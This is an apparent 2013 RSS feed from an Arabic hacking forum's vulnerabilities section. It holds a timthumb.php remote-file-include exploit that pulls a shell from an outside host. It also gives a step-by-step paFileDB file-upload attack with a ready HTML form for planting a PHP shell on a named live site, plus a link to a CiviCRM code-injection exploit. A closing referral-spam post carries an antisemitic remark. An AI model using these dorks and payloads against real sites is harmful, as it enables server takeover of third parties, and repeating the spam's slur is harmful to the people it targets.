منتديات جيوش الهكرز - قسم الثغرات http://www.aljyyosh.com/vb/ هذا القسم يعالج الثغرات بجميع أنواعها ويحوي شروحات عن كيفية أكتشاف الثغرات وأستغلالها ar Wed, 22 May 2013 21:16:33 GMT vBulletin 60 http://www.aljyyosh.com/vb/blackgreen/misc/rss.png منتديات جيوش الهكرز - قسم الثغرات http://www.aljyyosh.com/vb/ remote file include http://www.aljyyosh.com/vb/showthread.php?t=47934&goto=newpost Wed, 15 May 2013 08:11:50 GMT
السلام عليكم و رحمة الله و براكاته




remote file include

"timthumb.php"

دروك :- inurl:"wp-content/plugins/highlighter/libs/timthumb.php"

استغلال :- wp-content/plugins/highlighter/libs/timthumb.php?src=http://site.com/shell.txt

استعراض :- wp-content/plugins/highlighter/libs/temp/shell


تحياتي للجميع
]]> قسم الثغرات الجليد المشتعل http://www.aljyyosh.com/vb/showthread.php?t=47934 الثغرات وانواعها تفضل يا مبتدأ http://www.aljyyosh.com/vb/showthread.php?t=47933&goto=newpost Wed, 15 May 2013 04:39:28 GMT السلام عليكم ورحمة الله وبركاته قد يبدو الموضوع مكرر ولكن تم تكراره بسبب اهميته الكثير من المبتدئين يسأل عن الثغرات ويدخل مواضيع مثلا اختراق...
السلام عليكم ورحمة الله وبركاته

قد يبدو الموضوع مكرر ولكن تم تكراره بسبب اهميته

الكثير من المبتدئين يسأل عن الثغرات ويدخل مواضيع مثلا اختراق بواسطة ثغرا كذا ولا يفهم شي

ادخل الى الرابط وستعرف الثغرات انشاء الله لا تتردد في أسئلتك

http://macbook3arabi.blogspot.com/20...g-post_12.html

شكرا جزيلا
]]> قسم الثغرات Omar hcj http://www.aljyyosh.com/vb/showthread.php?t=47933 CiviCRM for Joomla 4.2.2 - Remote Code Injection http://www.aljyyosh.com/vb/showthread.php?t=47413&goto=newpost Fri, 26 Apr 2013 02:15:04 GMT PHP: ---------- http://www.exploit-db.com/exploits/24969/ ----------
كود PHP:
http://www.exploit-db.com/exploits/24969/ 
]]> قسم الثغرات موآدع http://www.aljyyosh.com/vb/showthread.php?t=47413 اختراق سيرفر كام بثغرة بسيطة جدا http://www.aljyyosh.com/vb/showthread.php?t=47390&goto=newpost Thu, 25 Apr 2013 12:34:17 GMT بسم الله الرحمن الرحيم شرح ثغرة PHP Arena paFileDB وأستغلالها. ============ الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على...

بسم الله الرحمن الرحيم

شرح ثغرة
PHP Arena paFileDB
وأستغلالها.
============
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
============
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.truez.com/download
نضيف عليه هالوصلة:
includes/team/file.php
ليصبح:
http://www.truez.com/download/includes/team/file.php
الأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
======================
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
http://www.truez.com/download/includes/team/file.php
إلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
http://www.truez.com/download/uploads/777.php

]]> قسم الثغرات xsalmanx http://www.aljyyosh.com/vb/showthread.php?t=47390 منقول:دعك من الكليك و أربح 3يورو في 3 أيام http://www.aljyyosh.com/vb/showthread.php?t=47361&goto=newpost Wed, 24 Apr 2013 12:14:53 GMT رابط الموقع ; http://www.fanslave.net/ref.php?ref=637160 طريقت التسجيل; صورة:... رابط الموقع ;
http://www.fanslave.net/ref.php?ref=637160
طريقت التسجيل;


بعد اتمام التسجيل قم بتسجيل الدخول, ثم ستجد في الصفحة الرئيسية للحساب هذا الزر




االصفحات التي ستظهر و تسجل إعجابك فيها


الحد الأدنى للسحب هو 15 يورو

سيحولك الموقع الى صفحة السحب اكتب حسابك على Payza او Paypal

التذكير برابط الموقع
http://www.fanslave.net/ref.php?ref=637160

للإشارة إن لم تتسجل على طريقي
وتسجلت لوحدك فسوف يتم ربح عميل أخر يمكن أن يكون يهودي ...
وأتمنى من الإدارة عدم الحذف ]]> قسم الثغرات salahuiste http://www.aljyyosh.com/vb/showthread.php?t=47361